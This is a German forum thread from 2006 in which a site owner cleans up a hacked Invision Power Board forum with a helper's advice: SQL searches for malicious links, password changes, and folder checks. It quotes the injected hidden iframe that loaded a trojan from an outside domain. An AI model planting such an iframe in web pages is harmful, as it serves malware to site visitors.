Dan5 0 Report post Posted May 28, 2006 Hallo Unser Board wurde gehackt. Beim Besuch der Seite wird eine Datei zum Download aufgerufen, welche den Trojaner "Exploit-WMF" (Link: Torjaner Info) beinhaltet. Nun bin ich gerade dabei Peters "Security Fixes, Updates And Enhancements For IPB 1.3.1" zu installieren. Dabei bin ich auf eine Unregelmässigkeit gestossen: Unter "Step 15" wird man aufgefordert, in der Datei sources/lib/post_parser.php Code zu ergänzen. Dies soll in den Funktionen regex_check_iframe(..) und regex_check_image(..) geschehen. Problem, die Funktion regex_check_iframe(..) ist bei mir überhaupt nicht vorhanden! Auch in der eben zum Vergleich runtergeladenen 1.3.1 Version, findet sich in der Datei post_parser.php keine Funktion regex_check_iframe!? Fehler? Mich würde zudem interessieren, wie ich diesen autom. Download wieder aus dem Board kriege. Reichen die Anpassungen im genannten Mod oder muss ich den irgendwie manuell entfernen? Ich verstehe aussderm nicht, wo dieser Aufruf geschieht? Aus der Datenbank? Ich verfüge noch über eine 2.x Version, welche ich gekauft habe und auf diese ich demnächst updaten wollte. Sollte ich vielleicht gleich ein Update auf diese Version Vornehmen? Kann ich damit die Probleme beheben? Über rasche Hilfe würde ich mich freuen! Grüsse. Share this post Link to post
Stefan 0 Report post Posted May 28, 2006 Prüf mal bitte, ob in deinem Board Wrapper etwas eingefügt wurde. Des Weiteren kann es es sein, das diverse Links in Beiträgen geändert wurden. Bevor du das Update machst, solltest du sicher sein, das an deinen Daten innerhalb der Datenbank keine Änderungen durch den "Hacker" gemacht wurden. Zusätzlich solltest du prüfen, welche Accounts Zugriff auf das ACP haben und bei denen das Passwort ändern. Verdächtige Accounts mit ACP Zugriff sofort löschen. Share this post Link to post
Dan5 0 Report post Posted May 28, 2006 (edited) Hallo Stefan Danke für die schnelle Antwort! Unbekannte Mitglieder in den Admin bzw. Moderatoren Gruppen sind nicht vorhanden. Allerdings wurde im Wrapper folgender Code eingefügt: <iframe src='http://traffall.biz/adv/195/new.php' width=1 height=1></iframe> Das dürfte auch der Übeltäter sein. Wie soll ich weitermachen? Grüsse. Edited May 28, 2006 by Dan5 Share this post Link to post
Stefan 0 Report post Posted May 28, 2006 Du kannst per SQL Statement prüfen, ob Links geändert wurden. SELECT * FROM ibf_posts WHERE post LIKE "%traffall.biz%"; SELECT * FROM ibf_posts WHERE post LIKE "%traffdollars.biz%"; SELECT * FROM ibf_posts WHERE post LIKE "%.biz%"; Share this post Link to post
Dan5 0 Report post Posted May 28, 2006 Hallo Stefan Ich habe diese Befehle in der "mySQL Toolbox" unter "Run a Query" ausgeführt, ist das korrekt? Ich erhalten jeweils folgender Fehler: Unknown column 'posts' in 'where clause' Grüsse. Share this post Link to post
Stefan 0 Report post Posted May 28, 2006 Ja, war ein Buchstabe zuviel. Hab die SQL Statements angepaßt, nun sollte es gehen. Share this post Link to post
Dan5 0 Report post Posted May 28, 2006 Hallo Stefan Alles negativ. Wie weiter? Somit alles in Ordnung? Grüsse. Share this post Link to post
Stefan 0 Report post Posted May 28, 2006 Sicherheitshalber würde ich das Passwort für die MySQL Datenbank ändern. Ebenfalls sollten alle Administratoren und Moderatoren ihre Passwörter ändern. Schau mal in dem upload Order, sowie archiv_in und archiv_out Ordner, ob dort noch irgendwelche Daten liegen, die da nicht hingehören. Share this post Link to post
Dan5 0 Report post Posted May 28, 2006 Die genannten Ordner sind soweit in Ordnung; keine fremde Dateien. Das Passwort wurde auch geändert. Share this post Link to post
